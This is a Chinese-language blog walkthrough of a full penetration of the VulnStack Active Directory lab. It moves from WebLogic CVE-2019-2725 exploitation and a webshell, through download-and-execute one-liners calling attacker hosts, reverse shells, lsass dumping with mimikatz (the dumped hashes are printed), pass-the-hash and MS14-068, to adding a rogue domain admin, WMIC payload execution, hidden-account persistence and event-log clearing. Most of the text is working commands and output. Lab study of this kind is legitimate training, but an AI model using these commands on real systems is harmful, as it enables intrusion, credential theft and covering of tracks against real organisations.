VulnStack域环境靶场渗透

环境配置

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX

Bypass UAC

Windows系统NTLM获取(理论知识:Windows认证)

Access Token利用(MSSQL利用)

WMI利用

网页代理,二层代理,特殊协议代理(DNS,ICMP)

域内信息收集

域漏洞利用:SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用

域凭证收集

后门技术(黄金票据/白银票据/Sid History/MOF)

环境说明
内网网段:10.10.10.1/24

DMZ网段:192.168.111.1/24

测试机地址:192.168.111.1(Windows),192.168.111.11(Linux)

防火墙策略(策略设置过后,测试机只能访问192段地址,模拟公网访问):

deny all tcp ports:10.10.10.1
allow all tcp ports:10.10.10.0/24
配置信息

DC
IP:10.10.10.10
OS:Windows 2012(64)
应用:AD域

WEB
IP1:10.10.10.80
IP2:192.168.111.80
OS:Windows 2008(64)
应用:Weblogic 10.3.6 MSSQL 2008

PC
IP1:10.10.10.20 1
IP2:192.168.111.201
OS:Windows 7(32)

攻击机
IP:192.168.111.1
OS:Windows 10(64)
IP:192.168.111.3
OS:Kali(64)

VMware workstation 15 配置为host only(相当于VMware虚拟一个局域网,类似于nat模式。但是这个局域网没有连互联网。)

设置为host only 旨在模拟真实环境

添加网卡VMnet1

在控制面板配置VMnet1的IP地址 子网掩码 默认网关,将此处网络配置为10段

DC域控网络配置

DC域控将网络适配器调整为VMnet1(host only),然后配置网络如下

可以看到已经和域环境ping通了

1
2
3
IP1:10.10.10.10(host only模式VMnat1)
网关: 10.10.10.1
OS:OS:Windows Server 2012 R2(64)

接下来配置PC个人端和WEB端

PC个人端

网络适配器2设置为 host only 模拟内网域环境

接下来设置另一个网络适配器 为nat模式

1
2
3
IP1:10.10.10.201(host only模式VMnat1)
IP2:192.168.111.201(nat模式)
OS:Windows 7旗舰版

web端

和PC端一样的设置

1
2
3
IP1:10.10.10.80(host only模式VMnat1)
IP2:192.168.111.80(nat模式)
OS:OS:Windows Server 2008 R2(64)

C:\Oracle\Middleware\user_projects\domains\base_domain\bin目录下存在三个批处理文件setDomainEnvstartManagedWebLogicstopManagedWebLogic。点击配置weblogic环境。

命令行下setDomainEnv 然后startManagedWebLogic 可以看到192.168.211.80已经配置好了weblogic环境,版本号为10.3.6.0,大概率存在cve-2019-2725这个漏洞

分割线(成了......原来有三个快照......我网络配置了三天,中间还出现密码不对的情况,真的是快把我给劝退了,原来下载好就可以运行的靶机折腾了这么久)

cve-2019-2725

使用lufeirider老哥写的工具 命令回显探测是否存在cve-2019-2725漏洞

然后burp发送payload RCE,但是burp弹出报错java.net.SocketException: Connection reset by peer: socket write error,之前在公网测试的时候还可以正常发paylaod,到了自己搭建的域环境就不行,于是我根据网上的方法下载了JCE拓展,解压得到两个jar文件,把他放在%JAVA_HOME/jre/lib/security目录中覆盖,再到Project option中设置SSL

在SSL标签中,先把默认的

Use the default protocols and ciphers of your java installation
选项改为

Use custom protocols and ciphers

然后就多出两个复选框,一个是选择支持的SSL协议,一个是加密算法,都全部勾选。最后再勾选

Allow unsafe renegotiation (required for some client certificate)

全部设置完后还是无效,放弃burp发包,找到直接上传webshell的脚本

访问http://192.168.111.80:7001//bea_wls_internal/demo.jsp?pwd=admin&cmd=ipconfig

我想到用Cobalt Strike 拿到图形化的shell

powershell

1
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.111.3:81/a'))"

bitadmin

1
cmd.exe /c bitsadmin /transfer ce71 http://192.168.111.2:80/a %APPDATA%\ce71.exe&%APPDATA%\ce71.exe&del %APPDATA%\ce71.exe

certutil

尝试Windows Executable 生成可执行exe木马或者Windows Executable(S) 生成无状态的可执行exe木马,放在80端口。

1
certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe shell.exe & shell.exe

拿到shell还是administrator权限的。

这里一直web服务端一直连不上我的物理机,后面修改了默认网关为192.168.111.1就行了。修改了默认网关后物理机 <-> 服务端的80端口(192.168.111.80:80), 物理机可以ping通虚拟机服务端(192.168.111.80),但是虚拟机服务端无法ping通物理机。

或者使用smb共享的shell复制到目标机

kali(192.168.111.3)

1
impacket-smbserver share `pwd`
1
http://192.168.111.80:7001//bea_wls_internal/demo.jsp?pwd=admin&cmd=copy \\192.168.111.3\share\shell.jsp servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\shell.jsp

但是之前上传的webshell无法使用copy等一些共享命令,所以不采用这种方法。

将图形化shell 派生到meterpreter

1.cs设置一个foreign的listener,监听端口为5555

2.msfconsole 设置如下,然后在CS客户端的shell下右键点击spawn

1
2
3
4
5
6
7
8
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.111.3
lhost => 192.168.111.3
msf5 exploit(multi/handler) > set lport 5555
lport => 5555
msf5 exploit(multi/handler) > show options

后渗透

信息收集

基本命令

1、获取当前组的计算机名(一般remark有Dc可能是域控):

1
net view

2、查看所有域

1
net view /domain

3、从计算机名获取ipv4地址

1
ping -n 1 DC1 -4

4、查看域中的用户名

1
2
dsquery user
net user /domain

5、查询域组名称

1
net group /domain

6、查询域管理员

1
net group "Domain Admins" /domain

7、添加域管理员账号

1
2
3
4
添加普通域用户 
net user lemon iam@L3m0n /add /domain
将普通域用户提升为域管理员
net group "Domain Admins" lemon /add /domain

8、查看当前计算机名,全名,用户名,系统版本,工作站域,登陆域

1
net config Workstation

9、查看域控制器(多域控制器的时候,而且只能用在域控制器上)

1
net group "Domain controllers

10、查询所有计算机名称

1
2
3
dsquery computer 
下面这条查询的时候,域控不会列出
net group "Domain Computers" /domain

11、net命令

①映射磁盘到本地

1
net use z: \\dc01\sysvol

②查看共享

1
net view \\192.168.0.1

③开启一个共享名为app$,在d:\config

1
net share app$=d:\config

12、跟踪路由

1
tracert 8.8.8.8

定位域控

1、查看域时间及域服务器的名

1
net time /domain

2、ldap

1
Nslookup -type=SRV _ldap._tcp.

3、通过ipconfig配置查找dns地址

1
ipconfig/all

4、查询域控

1
net group "Domain Controllers" /domain

判断出域为de1ay.com

proxy

http代理转发

上传代理

首先找到weblogic的web路径C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\

1
2
3
upload E:\PenetrationTools\GithubTools\冰蝎_v2.0.1\server\shell.jsp
shell dir
shell copy C:\Oracle\Middleware\user_projects\domains\base_domain\shell.jsp C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\shell.jsp

冰蝎连接,成功访问,连接路径

http://192.168.111.80:7001/_async/shell.jspx

在这个地方C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\接着上传proxy jsp

1.上传后在kali上执行命令

1
python reGeorgSocksProxy.py -p 6666 -u http://192.168.111.80:7001/_async/tunnel.jsp

2.然后编辑proxychains配置

1
vim /etc/proxychains.conf

3.将socks4 127.0.0.1 9095改为

1
socks5 127.0.0.1 6666

4.使用方法

在需要代理的命令前加上 proxychains,如:

1
python reGeorgSocksProxy.py -p 6666 -u http://192.168.111.80:7001/_async/tunnel.jsp

效果如下

缺点是扫描速度太慢

metasploit+proxychains

主要使用使用socks5辅助模块

1.查看目标主机路由信息

1
run get_local_subnets

2.添加路由(在 -s 前加-d是删除路由)

1
run autoroute -s 10.10.10.0/24

3.查看路由信息

1
run autoroute -p

4.设置好之后就使用socks5辅助模块

1
2
3
4
5
background
use auxiliary/server/socks5
set srvhost 127.0.0.1
set srvport 6666
run

5.proxychains代理扫描

1
proxychains nmap 10.10.10.10

Cobalt Strike socks代理

前面两种方法在我ssh连接的情况下经常会连接超时,每次我都得打开meterpreter监听然后再用spawn重新派生一个shell到meterpreter,非常麻烦,最后一种方法试试cs自带的socks代理功能

Cobalt Strike的最简单,ssh超时重连目标也不会掉。

1.在beacon中输入

1
beacon>socks 6666

2.配置proxychains.conf

1
socks4 127.0.0.1 6666

3.或者直接开启隧道使用msf

4.msf输入命令后可以加载模块进行扫描(ms07-010)

1
setg Proxies socks4:192.168.111.3:6666

提权

这里虽然拿到的权限是Administrator权限的,但是还是想拓展下提权这一块

Metasploit中的incognito

在Metasploit中,可使用incognito实现token窃取,常用命令如下:

加载incognito:load incognito

列举token:list_tokens -u

查看当前token:getuid

提示至system权限:getsystem

token窃取:impersonate_token "NT AUTHORITY\\SYSTEM"

从进程窃取:steal_token 1252

返回之前token:rev2self or drop_token

Windows中的incognito

Metasploit中的incognito,是从windows平台下的incognito移植过来的,下面介绍一下windows平台下的incognito

下载地址:

https://labs.mwrinfosecurity.com/assets/BlogFiles/incognito2.zip

常见用法如下:

列举token:incognito.exe list_tokens -u

复制token:incognito.exe execute [options] <token> <command>

提权至system:incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe

降权至当前用户:incognito.exe execute -c "WIN-R7MM90ERBMD\a" cmd.exe

伪造用户:incognito.exe execute -c "WIN-R7MM90ERBMD\b" cmd.exe

Invoke-TokenManipulation.ps1用法

下载地址:

https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-TokenManipulation.ps1

原理和功能同incognito类似,能够实际提权和降权

列举token:Invoke-TokenManipulation -Enumerate

提权至system:Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authority\system"

复制进程token:Invoke-TokenManipulation -CreateProcess "cmd.exe" -ProcessId 500

复制线程token:Invoke-TokenManipulation -CreateProcess "cmd.exe" -ThreadId 500

还有更多用法可参考该脚本说明

利用token获得TrustedInstaller权限

在Windows系统中,即使获得了管理员权限和system权限,也不能修改系统文件

因为Windows系统的最高权限为TrustedInstaller

1.验证是否获得TrustedInstaller权限的方法

对特殊路径写文件

1
echo 1 > C:\Windows\servicing\1.txt

使用powershell

1
Get-Acl -Path C:\Windows\servicing\TrustedInstaller.exe |select Owner

使用whoami

1
whoami /groups | findstr TrustedInstaller

2.getsystem提升到system权限

3.sc命令启动服务TrustedInstaller

1
shell sc start  trustedinstaller

4.ps命令找到TrustedInstaller的pid

1
ps

5.使用incognito获取TrustedInstaller.exe的token

1
steal_token TrustedInstall.exe的PID

6.写入文件成功,获得了TrustedInstaller权限

密码读取

NTML-Hash

在NTLM认证中,NTLM响应分为NTLMv1NTLMv2NTLM session v2三种协议,不同协议使用不同格式的Challenge和加密算法

所以也就存在不同协议的Net-NTLM hash,即Net-NTLM v1 hashNet-NTLM v2 hash

从攻击角度来看

  • 可以利用NTLM哈希值进行“哈希传递”攻击
  • 无法利用Net-NTLM哈希值来进行“哈希传递”攻击

本地获取

1.上传procdump64.exe和mimikatz

2.使用procdump来先dump内存hash,保存为dmp文件

1
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

3.mimikatz对dump下来的hash进行破解

1
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit > 1.txt

内容见文末

在默认情况下,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,密码字段显示为null,此时可以通过以下方式开启,但需要用户重新登录后才能成功抓取。但是目标系统为Windows 2008(64)

可以看到三个用户NTML-Hash

1
2
3
4
username::hostname:LM response:NTLM response:challenge
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
de1ay:1000:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

通过分析收集的凭证,我们找到以下字段:用户名和由冒号分隔的两个字符串; 这两个代表该用户的加密密码。
使用散列算法存储Windows凭据:

散列的第一部分表示LAN Manager(LM)散列。默认情况下,从Windows Vista和Windows Server 2008开始禁用LM身份验证协议,因为它确实不安全; 这就是为什么字符串“aad3b435b51404eeaad3b435b51404ee”代表一个空值(记住我们控制的是Windows Server 8的主机)。

第二部分代表NT LAN Manager(NTLM)哈希:NTLM是LM协议的升级版本,但它仍然容易受到密码破解攻击。这就是我们可以使用密码破解工具John The Ripper的原因 在字典攻击模式下查找相应的明文密码,也可以在ophcrack网站,进行破解

在Windows Server 2008 下是保存了明文密码的,如果是高于2008版本的需要进行解密。更多详情在ssooking表哥的博客有写。

LM HASH是一种较古老的Hash,在LAN Manager协议中使用,非常容易通过暴力破解获取明文凭据。Vista以前的Windows OS使用它,Vista之后的版本默认禁用了LM协议,但某些情况下还是可以使用。

NTLM Hash(NT LAN Manager)是支持Net NTLM认证协议及本地认证过程中的一个重要参数。其长度为32位,由数字与字母组成。它的前身是LM Hash,目前基本淘汰,两者相差不大,只是使用的加密算法不同。

本地认证:Windows不存储用户的明文密码,它会将用户的明文密码经过加密后存储在SAM (Security Account Manager Database,安全账号管理数据库)中。SAM文件的路径是%SystemRoot%\system32\config\sam。在进行本地认证的过程中,当用户登录时,系统将用户输入的明文密码加密成NTLM Hash,与SAM数据库中的NTLM Hash进行比较,从而实现认证。

使用cs的logonpasswords功能dmup明文密码,相当于把上面的procdump64读取内存+mimikatz破解哈希两步结合了,一把梭。

Net-NTLM hash

网络欺骗

这一步是通关靶场后进行的

使用Responder伪造服务,对相关请求进行响应。开启命令:

1
responder -I eth0

实战环境下,我们应该修改/etc/responder/Responder.conf配置文件,关闭其中的一些不必要的服务,从而减少网络流量,并产生针对性日志,如:

1
2
3
4
5
6
7
8
9
10
11
12
; Servers to start
SQL = Off
SMB = On
Kerberos = On
FTP = Off
POP = Off
SMTP = Off
IMAP = Off
HTTP = On
HTTPS = On
DNS = On
LDAP = On

针对测试而言,我们还可以设置Challenge值,以便观察流量格式:

1
Challenge = 1122334455667788

开启监听后,当用户进行了交互,如在资源管理器中以UNC路径形式访问伪造的服务器:

此时会弹出虚假认证界面,此时无论受害者是否输入凭据,我们都已经获取了NET NTML Hash

responder默认会将日志保存在/usr/share/responder/logs下,hash记录文件以HTTP-NTLMv2 SMBv2-NTLMv2等前缀开头。

hashcat解密

1
hashcat64.exe -m 5600 SMBv2-NTLMv2-SSP-192.168.111.80.txt hashpass.txt -o success.txt --force
  • -m 破解hash类型
  • -a 破解模式(0 1 3 6 7)
  • -o 输出文档
  • –force代表强制执行,测试系统不支持Intel OpenCL

在渗透测试中,我们还可以通过其他技巧获取Net-NTML Hash,如:

  • 命令执行:regsvr32powershell
  • 钓鱼文档:doc、docx、pdf
  • 后门设置:

例:

1
2
3
4
5
6
7
regsvr32 /s /u /i://17.10.0.1/@abc hello.dll

powershell -c "Invoke-Item \\17.10.0.1\aa"
powershell -nop -exec bypass -c "Invoke-Item \\17.10.0.1\aa"
Invoke-Item \\192.168.0.1\aa
Get-Content \\192.168.0.1\aa
Start-Process \\192.168.0.1\aa

计算机密码

LaZagne项目是用于开源应用程序获取大量的密码存储在本地计算机上。每个软件都使用不同的技术(纯文本,API,自定义算法,数据库等)存储其密码。开发该工具的目的是为最常用的软件找到这些密码。

工具地址:https://github.com/AlessandroZ/LaZagne

Cobalt Strike 上传LaZagne,查看是否可以读取到其他密码信息

没有密码信息..

1
[+] 0 passwords have been found.

横向移动

MS17-010

1
2
3
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.10.10.10
msf auxiliary(scanner/smb/smb_ms17_010) > exploit

可设置扫描段 set RHOSTS 10.10.10.0/24

探测存在永恒之蓝漏洞

1
2
3
4
msf > use exploit/windows/smb/ms17_010_eternalblue 
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.10
msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.10.80
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

没打成功,试试域中另一个用户10.10.10.201也没能成功

Pass the Hash

SMB的认证可以基于NTLM协议或者kerberos协议,前者使用了hash,后者使用了ticket,是构成SMB的PtHPtT攻击的基础。

NTLM 并没有定义它所依赖的传输层协议。NTLM 消息的传输完全依赖于使用 NTLM 的上层协议来决定,可以是SMB,也可以是TCP,亦或HTTP。

pass-the-hash在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。

这类攻击适用于:

  • 域/工作组环境
  • 可以获得hash,但是条件不允许对hash爆破
  • 内网中存在和当前机器相同的密码

1.查看当前计算机名,全名,用户名,系统版本,工作站域,登陆域

1
net config Workstation

2.查找域控

1
net group "domain controllers" /domain

3.这里使用的是cs的pth模块进行,使用mimikatz传递hash

1
pth domain\user NTLM

4.成功访问域控资源

1
dir \\dc.de1ay.com\c$

Pass the Ticket

这一步作为拓展

PtT攻击的部分就不是简单的ntlm认证了,它是利用Kerberos协议进行攻击的,三种常见的攻击方法:MS14-068,Golden ticket,SILVER TICKET.

关于Ticket在这边文章上写的非常清楚:域渗透-Ticket

关于Kerberos:域渗透-Kerberos

在这里我使用ms14-068进行PsT攻击

MS14-068是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC(表示所有用户权限的结构)。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。用户可以通过呈现具有改变的PAC的Kerberos TGT来获得票证.

1.得到普通域用户的sid

1
whoami /user
1
de1ay\administrator S-1-5-21-2756371121-2868759905-3853650604-500

2.Cobalt Strike socks 代理

1
beacon> socks 6666

3.编辑proxychains配置

1
2
vim /etc/proxychains.conf
socks 6666

4.kali 攻击机运行

1
python ms14-068.py -u mssql@de1ay.com -s S-1-5-21-2756371121-2868759905-3853650604-500 -d 10.10.10.10 -p '1qaz@WSX'

5.使用 KrbCredExport进行转换

1
python KrbCredExport.py TGT_mssql@de1ay.com.ccache mssql.ticket

6.使用cobalt strike进行凭据注入

清除凭证

1
kerberos_ticket_purge

7.使用kerberos_ticket_use进行凭据注入

1
kerberos_ticket_use de1ay.ticket

8.尝试访问域控资源

1
dir \\dc.de1ay.com\c$

添加域控管理员

1
2
net user hacker P@ssword /add /doamin
net group "Domain admins" hacker /add /domain

这里一直添加不上,开始我以为是命令的问题,后面用CS中的进程管理发现本地存在360

这里尝试先登录web端(192.168.111.80 <-> 10.10.10.80),但是3389没有开放

所以在Cobalt Strike 下使用命令

1.查看端口开放情况

1
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSconnections

若返回 0x1 表示关闭,0x0表示开启

2.通过查询注册表查看远程服务端口

1
for /f "tokens=2 delims=x" %a in ('reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" ^| find "PortNumber"') do (set /a n=0x%a)

3.3389端口

1)开启3389端口:

在cmd内,执行如下命令,即可开启3389端口。

1
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

2)关闭3389端口:

在cmd内,执行如下命令,即可关闭3389端口。

1
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

3)也可以通过导入注册表来开启3389,本质一样。

1
2
3
4
5
6
7
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3d

保存为test.reg,然后执行 regedit /s test.reg

4.通过查看端口得知,开启成功

1
shell netstat -ano | findstr 3389

5.根据抓取的账号密码登陆web端(192.168.111.80)的3389关闭360

6.添加域控管理员

1
2
net user hacker P@ssword /add /doamin
net group "Domain admins" hacker /add /domain

7.添加后查看域控是否成功加入域控管理员

1
net user "Domain Admins" /domain

成功加入域控管理员

IPC连接

建立IPC$连接上传木马 建立后可以访问目标机器的文件(上传、下载),也可以在目标机器上运行命令。上传和下载文件直接通过copy命令就可以,不过路径换成UNC路径。(这里需要用到刚才添加的域控管理员密码

常用命令

1
2
3
net use \\ip\ipc$ pawword /user:username   建立IPC连接 
copy hacker.exe \\10.10.10.10\C$\windows\temp 复制本地文件到目标服务器
copy \\10.10.10.10\C$\windows\temp\hash.txt 复制目标服务器文件到本地

这里使用的是msf来中转路由

1.meterpreter生成payload.exe

1
msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.10.80 LPORT=8888 -f exe > /tmp/payload.exe

2.ipc连接

1
beacon> copy C:\Wh0ale\paylaod.exe \\10.10.10.10\c$\windows\temp\paylaod.exe

3.meterpreter进行监听

1
2
3
4
5
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.80
set lport 8888

4.在跳板机上通过wmic命令执行木马

1
beacon> wmic /node:10.10.10.10 /user:hacker /password:P@ssword process call create "C:\Windows\Temp\paylaod.exe"

这里参考的是klion表哥教程: win内网中利用ipc弹shell 小记

使用到通过mimikatz读取内存获取的账号密码,在DC域控上创建一个进程"c:\Windows\temp\paylaod.exe"

5.sessions

使用Cobalt Strike中转路由

做一步作为拓展

1.点击Listener 同meterpreter设置 lport ,lhost

2.生成木马,设置listener为刚才设置的vulnstack_msf

3.ipc连接

1
beacib> copy C:\Wh0ale\paylaod1.exe \\10.10.10.10\c$\windows\temp\paylaod1.exe

4.在跳板机上通过wmic命令执行木马

1
beacon> wmic /node:10.10.10.10 /user:hacker /password:P@ssword process call create "C:\Windows\Temp\paylaod1.exe"

5.成了,如果是在dc.de1ay.com双击木马是普通权限,通过cs的中转路由是administrator权限,此时我们拿到域控的管理员权限

这里不知道是我输入的问题,还是CS的问题,同样的命令我粘贴到beacon执行就无法执行成功,手打才可以

logonpasswords已经读取到域控的明文密码了

MSF派生shell给Cobaltstrike

获取MSF shell、建立session后在meterpreter执行background将会话放到后台,切换payload。

1
2
3
4
5
6
7
msf exploit(handler) >  use exploit/windows/local/payload_inject
msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
msf exploit(payload_inject) > set LHOST [Listener监听IP]
msf exploit(payload_inject) > set LPORT [Listener监听端口]
msf exploit(payload_inject) > set SESSION [session ID]
msf exploit(payload_inject) > exploit

Cobalt Strike 监听和msf设置的相同端口。

本来想把msf的shell弹回Cobalt Strike,一直没能成功

权限维持

1.上传Invoke-TokenManipulation.ps1Windows-User-Clone.ps1

1
2
upload Invoke-TokenManipulation.ps1
upload Windows-User-Clone.ps1

2.设置当前用户的执行 策略为Unrestricted,也算是去更改了当前的全局策略

1
2
Get-ExecutionPolicy
Set-ExecutionPolicy Unrestricted

3.3389登陆(我懒得3389连了,直接在虚拟机上运行了)

Invoke-TokenManipulation.ps1用于打开一个System权限的进程

1
2
Import-Module C:\Wh0ale\Invoke-TokenManipulation.ps1
Invoke-TokenManipulation -CreateProcess "cmd.exe" -Username "nt authority\system"

4.运行Windows-User-Clone.ps1

1
2
powershell Import-Module C:\Wh0ale\Windows-User-Clone.ps1
Create-Clone -u abc -p abc123 -cu administrator

域有密码长度限制将ps文件的密码也修改下

1
Create-Clone -u abc -p P@ssword -cu administrator

5.查看是否添加成功

主要原理是

Invoke-TokenManipulation.ps1 通过token复制获得system权限

Windows-User-Clone.ps1

  • 新建测试帐户
  • 将注册表导出到temp目录,进行替换
  • 删除特殊帐户
  • 导入注册表文件

防御

针对隐藏帐户的利用,查看注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\即可

当然,默认管理员权限无法查看,需要分配权限或是提升至Sytem权限

隐藏帐户的登录记录,可通过查看日志获取

痕迹清理

获取日志分类列表:

1
wevtutil el >1.txt

获取单个日志类别的统计信息:

1
wevtutil gli "windows powershell"

回显:

1
2
3
4
5
6
7
creationTime: 2016-11-28T06:01:37.986Z
lastAccessTime: 2016-11-28T06:01:37.986Z
lastWriteTime: 2017-08-08T08:01:20.979Z
fileSize: 1118208
attributes: 32
numberOfLogRecords: 1228
oldestRecordNumber: 1

查看指定日志的具体内容:

1
wevtutil qe /f:text "windows powershell"

删除单个日志类别的所有信息:

1
wevtutil cl "windows powershell"

破坏Windows日志记录功能

利用工具

msf

1
run clearlogs
1
clearev

3389登陆记录清除

1
2
3
4
@echo off
@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
@del "%USERPROFILE%\My Documents\Default.rdp" /a
@exit

以上就是Vulnstack整个渗透过程,在渗透过程没出现比较难的点,基本上就是环境搭建花费的事件比较长,在本地搭建的的对性能消耗很大,开三个虚拟机加一个文档编辑器就卡的不行了,下次考虑在公司服务器上搭建下。

todo

域渗透过程中协议通信研究

hackthebox域渗透

根据特征写PRS防御横向移动规则

参考

ATT&CK红队评估实战靶场二

从外网到域控(vulnstack靶机实战2)

域渗透-Relay

Windows下的密码hash-NTLM-hash和Net-NTLM-hash介绍

win内网中利用ipc弹shell 小记

比CMD更强大的命令行:WMIC后渗透利用(系统命令)

域渗透之NTML-Hash

渗透技巧——Windows系统的帐户隐藏

https://github.com/Ridter/Pentest

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319

.#####. mimikatz 2.2.0 (x64) #18362 Nov 25 2019 02:50:28
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz(commandline) # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

mimikatz(commandline) # sekurlsa::logonPasswords full
Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 9591948 (00000000:00925c8c)
Session : Service from 0
User Name : DefaultAppPool
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 2019/12/13 13:59:21
SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
msv :
[00000003] Primary
* Username : WEB$
* Domain : DE1AY
* NTLM : 7b90fe98b4ecc112e6a63567da6e0f32
* SHA1 : e778e52157e2e7b485d4a9d9cb1858a8ee3650c8
tspkg :
* Username : WEB$
* Domain : DE1AY
* Password : 63 07 1e bd 74 cd 8f 4d d4 e2 3f 76 39 68 15 a4 1d 17 09 1a 56 0f 5c 0e cc b1 d3 d4 c5 a4 f3 b6 eb 19 6b 49 ad de 2c b7 ab e9 9b 4b 00 0f ca a5 cf 8b a4 84 f3 18 c8 89 b7 64 3b 50 6c 84 99 9c 12 e2 dd df 9f 07 fe 14 c4 48 df 08 34 4c 7e 52 0b e6 45 51 51 54 06 5c 68 04 ae 9b 78 33 e6 ad b1 1e 90 b8 6c 1c 7e 00 7a 1f 8a b4 25 8f fd f1 56 c1 02 ba a2 a9 c1 03 96 46 ac e3 41 a1 0f 17 14 2c 6b 7e c4 f9 f0 01 cf f2 bb 34 e7 44 cc cc db ef 7d a1 d6 f1 7e 85 47 91 d2 09 c3 9c f1 b1 14 66 97 b6 2b 70 67 b8 b2 ce fc 48 75 93 41 a9 d7 13 eb 86 08 ff 9b 20 69 84 4f 94 48 d8 07 d9 dd 74 c4 b4 c9 5c df de c3 1f 0b fe e5 cf 0f dd 74 8d 5c 2b 1c 5c 69 f7 ef ac f4 85 85 cc ec 91 ba 88 d2 07 cc 1d 38 ab d4 df d4 3a a4 0e 08 28
wdigest :
* Username : WEB$
* Domain : DE1AY
